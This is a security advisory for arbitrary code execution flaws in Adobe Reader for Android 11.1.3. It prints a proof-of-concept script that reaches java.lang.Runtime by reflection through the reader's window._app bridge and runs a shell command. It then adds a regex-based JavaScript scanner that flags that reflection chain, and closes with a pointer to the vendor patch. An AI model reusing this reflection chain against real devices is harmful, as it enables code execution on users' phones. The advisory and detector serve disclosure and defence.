Release date:
Updated on:
Affected Systems:
Adobe Reader for Android
Description:
--------------------------------------------------------------------------------
Bugtraq id: 66798
Adobe Reader for Android is a free Adobe Reader mobile app for Android and iOS devices (including iPad and iPhone).
Adobe Reader for Android 11.1.3 has multiple arbitrary code execution vulnerabilities. Attackers can exploit these vulnerabilities to execute arbitrary code in the context of the affected application.
<* Source: Yorick Koster *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
function execute(bridge, cmd) {
    // Reach java.lang.Runtime by reflection from the exposed bridge object
    return bridge.getClass().forName('java.lang.Runtime')
        .getMethod('getRuntime', null).invoke(null, null).exec(cmd);
}

// window._app is the object the reader exposes to document JavaScript
if (window._app) {
    try {
        var path = '/data/com.adobe.reader/erereader.poc.txt';
        execute(window._app, ['/system/bin/sh', '-c', 'echo \"Lorem ipsum\" > ' + path]);
        window._app.alert(path + ' created', 3);
    } catch (e) {
        window._app.alert(e, 0);
    }
}
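
The test code above reaches java.lang.Runtime by calling getClass() on the object the reader exposes to document JavaScript as window._app. As an added example (not part of the original advisory or of the vendor's fix), the JavaScript check below flags that reflection chain in script extracted from a document; the rule ids, function names and sample scripts are assumptions constructed for illustration.

```javascript
'use strict';
// Added example: flag Java reflection reached through a script bridge object.
// Rule ids, function names and the samples below are constructed for illustration.
const RULES = [
  { id: 'getClass-on-bridge', re: /\.getClass\(\)/ },
  { id: 'forName-java-class', re: /\.forName\((['"])java\.[\w.]+\1\)/ },
  { id: 'getMethod-lookup', re: /\.getMethod\(/ },
  { id: 'reflective-invoke', re: /\.invoke\(/ },
];

// Undo cheap evasions before matching. Whitespace is dropped everywhere
// (string literals included), which is fine because the result is only matched.
function normalize(src) {
  let s = src
    .replace(/\/\*[\s\S]*?\*\//g, '')        // block comments
    .replace(/(^|[^:'"])\/\/.*$/gm, '$1')    // line comments (heuristic, keeps "http://")
    .replace(/\s+/g, '');
  let prev;
  do {                                        // fold 'java.' + 'lang' into one literal
    prev = s;
    s = s.replace(/(['"])([^'"]*)\1\+(['"])([^'"]*)\3/g, "'$2$4'");
  } while (s !== prev);
  return s.replace(/\[(['"])([A-Za-z_$][\w$]*)\1\]/g, '.$2'); // obj['m'] -> obj.m
}

function scan(src) {
  const text = normalize(src);
  const hits = RULES.filter((r) => r.re.test(text)).map((r) => r.id);
  const chain = hits.includes('getClass-on-bridge') && hits.includes('forName-java-class');
  return { hits, verdict: chain ? 'block' : hits.length ? 'review' : 'clean' };
}

// Constructed samples: a class lookup split across strings and bracket access,
// and an ordinary call to the bridge's alert method.
const SAMPLE_SUSPECT = [
  '// lookup only, no command is run',
  "var rt = window._app['getClass']()",
  "  .forName('java.lang.' + 'Run' + \"time\")",
  "  .getMethod('getRuntime', null);",
].join('\n');
const SAMPLE_BENIGN = "window._app.alert('Document opened: ' + name, 3);";

console.log(scan(SAMPLE_SUSPECT), scan(SAMPLE_BENIGN));
```

A 'block' verdict means getClass() and a forName() lookup of a java.* class both appear after normalization; a single rule hit is reported as 'review'.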
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Adobe
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.adobe.com/support/security/